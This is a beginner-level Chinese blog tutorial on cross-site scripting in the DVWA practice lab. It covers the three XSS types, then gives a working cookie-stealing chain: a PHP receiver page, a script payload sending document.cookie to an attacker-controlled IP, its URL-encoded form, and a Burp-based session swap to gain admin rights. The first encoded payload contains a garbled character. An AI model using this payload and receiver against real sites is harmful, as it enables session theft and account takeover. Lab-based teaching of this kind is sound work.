小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

admin 2022年4月7日20:40:56安全文章评论56 views2236字阅读7分27秒阅读模式



    首先,我们需要用到前面文章所搭建的DVWA靶场,还没看的可以点击这里

废话不多说,本篇文章写给入门的朋友,希望大家好好学习,我这里都是用实战举例,并非单纯理论,所以想要学习的朋友先搭建好靶场。

一、几种xss类型的讲解

xss分为反射型、存储型和DOM型三种类型,这里我给大家一一讲解

先将靶场难度调制最低,方便我们实验

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

首先是反射型,反射型就是插入js脚本后只弹出一次,刷新页面后不再出现,不保存在页面或者数据库中。来到下图中的页面,在输入框中输入代码

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!


我们来实验一下,插入一个弹出框的js代码。

<script>alert('bai');</script>

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

再来看看存储型,存储型就是页面将恶意的js代码插入到了页面并且保存在页面或者数据库中,这个时候只要访问页面就会触发js代码并且执行。

最经典的就是留言板功能,我们依旧使用上面的js弹窗来实验一下功能。代码还是一样

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!


我们在第一的位置输入我们的js代码,在2的位置被保存,然后在3的位置我们可以看到js代码被带入了页面中执行,我们刷新一下看看。

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

直接就执行了我们的js代码。

最后是DOM型,这个类型和反射型差不多,但是他们的区别在于一个针对后台一个是基于前端的js实现,就是DOM类型只在前端html代码中带入。

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

这里1位置将参数传给2位置,未经过滤我们就可以直接传如恶意js进去。

这里我大致讲了一下,如果还有不懂的,可能是涉及到前端js一些内容不太会的朋友可以补习一下。


二、窃取用户cookie保存到自己服务器中,使用cookie越权

首先讲一下这里所需要的环境,首先你需要一个接收的服务器,可以用虚拟机搭建一个,安装apache即可,然后将下面写的页面放到apache根目录,不会的朋友可以自行百度学一下Linux下网站搭建,当然Windows也是可以的。我的服务器环境是Linux,下面都是以Linux为准。

我们要盗取cookie首先要写一个接受的页面来保存接收cookie。这里我新建一个cookiein.php文件,写入下面的代码。

<?php$cookie=$_GET['cookie'];file_put_contents('cookie.txt',$cookie);?>


意思是将cookie保存到$cookie函数中然后保存到cookie.txt文件中

我们再创建一个cookie.txt文件

touch cookie.txt

然后我们利用反射型xss进行攻击,首先来构造一个payload,我们接收cookie的地址为

http://192.168.43.15/cookiein.php

所以我们构造的语句为

<script>document.location='http://192.168.43.15/cookiein.php?cookie='+document.cookie;</script>

我们可以将这个payload进行url编码。

%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%19%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%34%33%2e%31%35%2f%63%6f%6f%6b%69%65%69%6e%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%19%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

然后我们将代码插入到url中参数name后面,和原本的url拼接起来,利用反射型的xss

192.168.43.163/DVWA-master/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%34%33%2e%31%35%2f%63%6f%6f%6b%69%65%69%6e%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

访问这个我们拼接后的url然后就会跳转到cookiein.php页面

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!



然后我们查看kali中的cookie就会就看到已经放到了文件中。

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

这里我们成功盗取了cookie的值,下一步我们使用普通用户登录靶场,然后使用burp进行抓包来越权登录。

我们首先登录一个普通权限用户(ps:这里的普通账号是靶场自带的,可以自己去数据库查看)

账号:smithy    密码:Password

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

然后我们打开burp suite进行抓包拦截,burp不太会用朋友可以自行百度一下。

我们刷新页面抓一个包

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

抓到cookie值后我们将盗取的cookie复制到我们抓到的包里面的cookie后面,将原本的cookie删除

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!


小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

然后我们将包发送过去

小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

成功更换成了管理员的权限,实现越权。

原文始发于微信公众号(白安全组):小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我!

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月7日20:40:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  小白都能看懂的xss原理解析与窃取用户cookie并实现越权实战,看不懂拿板砖敲我! http://cn-sec.com/archives/883698.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: